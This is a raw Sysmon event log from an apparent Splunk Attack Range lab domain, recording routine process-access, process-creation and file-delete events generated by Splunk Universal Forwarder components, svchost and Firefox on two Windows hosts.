08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811045Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F92C-60EB-F979-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000811044Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F92C-60EB-F979-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000811043Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.279{0C1E0330-F92C-60EB-F979-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000811087Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.980{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=665D9C0972C4A713BED10110AB0B42A3,SHA256=BB063E11E6016D953CEF0BE55D80B646BFB377979F8DDED95A0CE13124F9833C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000811086Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:25.840{0C1E0330-F92D-60EB-FB79-00000000D001}340952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:25.768{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\permissions.sqlite-journalMD5=389AD9CBFC4A5391ADD91EBE5A9EC936,SHA256=0D1A524244521C09CCE4E33661C08DA72B5C59F63ED206A62BA085D2BCBCC752,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:25.000{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49B71B3A038C96785D80B92603096750,SHA256=B4B3D75AF14AE6EF7E246F87A9E54F36477F0AA3031F4C24A363560DE6874035,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000811085Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F92D-60EB-FB79-00000000D001}340C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811084Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811083Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811082Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811081Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811080Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811079Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811078Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811077Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811076Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811075Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:25.683{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F92D-60EB-FB79-00000000D001}340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000811074Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.668{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F92D-60EB-FB79-00000000D001}340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000811073Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.668{0C1E0330-F92D-60EB-FB79-00000000D001}340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000811072Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.293{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5CF074353B2FAD7651EC27A728B23AA,SHA256=E1E86D05CBAB62029D6721084C66B65C3872258B65624218F37156D6E2C44CD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811071Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.293{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C94FD9ACE15646AE05DCCC96ABFDF06F,SHA256=E1445FE012BC21FCFCFEDE8C5D7094B8307A3CEA6ED4AADA26EBF2FCD7E862F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000811070Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F92C-60EB-FA79-00000000D001}764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x8000000000000000811102Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.855{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51E070AFB03CDF13AACE80DC9F10F999,SHA256=9C593D8D9CB16A7161CFCF0B63B8B8373043313741D0660A2FEA3FD03D5D64AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:26.018{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C7637648407F551F6E65B12E5253768,SHA256=DBE695C781FA0AF158A343903462499EFD6CC7339C2C0A2A55D723CBF9A30C6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811101Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.683{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5CF074353B2FAD7651EC27A728B23AA,SHA256=E1E86D05CBAB62029D6721084C66B65C3872258B65624218F37156D6E2C44CD8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000811100Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F92E-60EB-FC79-00000000D001}3884C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811099Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811098Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811097Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811096Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
